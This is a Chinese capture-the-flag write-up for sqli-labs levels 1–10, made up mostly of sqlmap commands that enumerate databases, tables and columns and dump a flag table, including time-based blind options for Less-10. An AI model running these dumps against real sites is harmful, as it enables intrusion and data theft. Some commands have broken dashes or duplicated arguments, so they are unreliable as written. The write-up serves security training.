sqli-labs 1
Less-1/ Less-2/ Less-3/ Less-4 Less-5/Less-6/Less-7Less-8/ Less-9
1、打开页面,尝试输入?id=1,?id=2…,都会有回显,所以确定这类题为sql注入,接下来我们依然来进行四部曲(暴库,暴表,暴字段,暴密码)

- 暴库
sqlmap -u 'http://1dfcaf0d-2122-455e-907b-7e7aaafa23e9.node5.buuoj.cn/Less-1/?id=1' –dbs

3、暴表
sqlmap -u 'http://1dfcaf0d-2122-455e-907b-7e7aaafa23e9.node5.buuoj.cn/Less-1/?id=1' -D ctftraining –tables

4、暴字段
sqlmap -u 'http://1dfcaf0d-2122-455e-907b-7e7aaafa23e9.node5.buuoj.cn/Less-1/?id=1' -D ctftraining -T flag -columns

- 暴flag
sqlmap -u 'http://1dfcaf0d-2122-455e-907b-7e7aaafa23e9.node5.buuoj.cn/Less-1/?id=1' -random-agent -D ctftraining -T flag flag -dump

Less-10
1、明确指定注入类型(时间盲注)
Less-10 通常需要时间盲注,可强制 sqlmap 测试该类型:
sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent --dbs --technique=T
--technique=T:指定仅测试时间盲注(Time-based blind),跳过其他类型,提高针对性。
2、提高测试级别和风险(推荐)
默认--level=1和--risk=1测试强度较低,可提高至:
sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent --dbs --level=3 --risk=2
--level=3:增加测试 payload 的数量,包括更多特殊字符和边界测试(Level 3 及以上会测试 Cookie、User-Agent 等,但这里主要针对id参数)。
--risk=2:允许使用可能影响数据完整性的 payload(如OR、UNION等,适合盲注场景)。
3. 手动指定参数闭合方式(关键)
Less-10 的id通常被单引号包裹,可手动告诉 sqlmap 闭合方式,避免其猜测错误:
sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent --dbs --technique=T -p id --prefix "'" --suffix "--+"
-p id:明确指定测试id参数。
--prefix "'":指定参数前的闭合符为单引号(即id='1'中的单引号)。
--suffix "--+":指定参数后的注释符(--+用于注释掉后面的 SQL 语句,避免语法错误)。
4、延长时间盲注检测等待时间
若目标响应较慢,可增加延迟判断时间(默认 5 秒)
sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent --dbs --technique=T --time-sec=10
--time-sec=10:设置时间盲注的延迟阈值为 10 秒(即注入语句若使服务器延迟 10 秒以上,则判定为有效)。
5、本题选择提高测试级别和风险(推荐)暴库
sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent --dbs --level=3 --risk=2

6、暴表
sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent -D ctftraining --tables --level=3 --risk=2

- 暴字段
sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent -D ctftraining -T flag --columns --level=3 --risk=2

- 暴内容
sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent -D ctftraining -T flag flag --dump --level=3 --risk=2
